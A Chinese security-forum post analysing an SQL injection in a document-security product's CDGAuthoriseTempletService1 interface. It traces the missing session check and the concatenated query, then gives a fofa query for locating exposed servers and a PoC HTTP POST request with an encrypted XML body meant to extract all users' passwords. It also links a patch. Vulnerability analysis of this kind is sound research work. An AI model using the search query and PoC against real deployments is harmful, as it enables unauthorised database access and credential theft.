问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
某通文档xxx系统sql注入分析
漏洞分析
某通文档xxx系统sql注入分析
一.漏洞描述 ------ 某通文档xxx系统(简称CDG)是一款综合性的数据智能安全产品,主要用于保护电子文档的安全某通文档xxx系统的 CDGAuthoriseTempletService1 接口存在 SQL 注入漏洞。攻击者可以通过构造特定的 POST 请求注入恶意 SQL 代码,利用该漏洞对数据库执行任意 SQL 操作,获取所有用户的账户密码信息。 资产测绘搜索语句 -------- fofa: body="/CDGServer3/index.jsp" ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-94ff8d81f8d8dfa1291e4e5b7f8a11bb474854b0.png) 二.影响厂商产品 -------- 某通文档xxx系统version<5.6.3.152.179受影响。 三.漏洞分析 ------ 漏洞点快速查找,拿到源代码后,根据某步平台给出路径CDGAuthoriseTempletService1查找相关类文件 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-d5d7a5e4f9adee6a228688514aaa778d76c17d63.png) 文件路径为:\\tomcat\\webapps\\CDGServer3\\WEB-INF\\lib\\jhiberest.jar!\\com\\esafenet\\servlet\\service\\document\\CDGAuthoriseTempletService1.class 首先分析下路由与鉴权 分析web.xml配置文件 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-539562c95e7f14bb76a9d1a9c97bfaa7e9114431.png) 在该漏洞版本的代码中,该/CDGAuthoriseTempletService1/接口路径未设置serssion效验 对比新版代码里的xml文件,显而易见已增加效验 ![520c4b79117734ab774e7de6479a8d5.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-a303d39f5c5bbfbf6a7cdfe42a4154534ae8c02f.png) GetCDGAuthoriseTemplet gcat = (GetCDGAuthoriseTemplet)this.xStream.fromXML(toServerXML); ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-4e5ad1e5d3391586820b6e22a6d90c4a0b821c8e.png) 继续分析漏洞点,使用`XStream`库将名为`toServerXML`的XML字符串解析成`GetCDGAuthoriseTemplet`类型的Java对象,并将这个对象赋值给名为`gcat`的变量 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-e57b9dac07b92f35819d6ce0bfd2ef44763252dd.png) 跟进代码发现调⽤validateInfo对其进⾏检查,验证用户ID(`userId`)和密级ID(`secretLevelId`)的有效性,进入else需要返回true才行所以我们要知道一个一定存在用户名,默认系统用户为SystemAdmin ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-c6cb0c1f7aec76c094aa68c020aeb840a63c3080.png) 继续跟进发现调⽤ getAuthoriseTempletList 方法 ,发现此处进行拼接查询 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-9a27a3265f2f27797b5e1057a4c263e59537a790.png) userId固定,注入参数为secretLevelId,构造xml数据包 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-e073ff8052f213b2f82f5e3b338c6670a2634b5c.png) 需要利用工具加密 poc: POST /CDGServer3/CDGAuthoriseTempletService1 HTTP/1.1 Host: x Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 CGKFAICMPFGICCPHKFGGGBOMICMOKOBGPCBLKPCAHAGPFJHFABCPPKIOHIAIBJLLHJCODJMAGKBGIKDAFJHJMMKBDHABAJPBFNLBOIDFBHMMFKFHLPIAOPHEOAICJEMBCKFEIPGINHHBEGDOMEOPDKJGPNIJEDNOMEKLJHCGOJCEIPFPEDGBEHJLMNEEFIKFPGCCKCFCCOMONKACOEENLFIBAGNJBLHDEJCIPHOPDOAMGLINIEJDIFOLLGEDIDMDAKIPEINHHOFBOHLPEJBPJBKJLDDEIFOGLGHKANECEEGNDCNMJNLNJBFKNGKKJFODMFEKBOGFNDNJMCMHOFJBLGHEBALFGNNGLPBMKHHHGNKNHJGLFLODDIKAAOOOAJAEMBLBNMGOFJELPABKOEGMFLIBGPMHJPEJCKFBGHHNGMDAJBKBNNMIMFELPGEHDFGNHMBLEIKMINOAOAINBLEOIGHAMOPDNOIFFEFLGBFOFAGACH 四.漏洞复现 ------ ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-fd07a3312fc7250a784c5c4e3c0c963bbefbab38.png) 官网补丁 ---- <https://update.nsfocus.com/update/downloads/id/159558>
发表于 2024-08-09 14:44:43
阅读 ( 3982 )
分类:
OA产品
8 推荐
收藏
4 条评论
罗辑
1秒前
666
请先
登录
后评论
低哼
1秒前
tql
请先
登录
后评论
罗辑
1秒前
太强了,有点看懂了
请先
登录
后评论
NanNnCheng
1秒前
NB
请先
登录
后评论
请先
登录
后评论
lei_sec
1 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!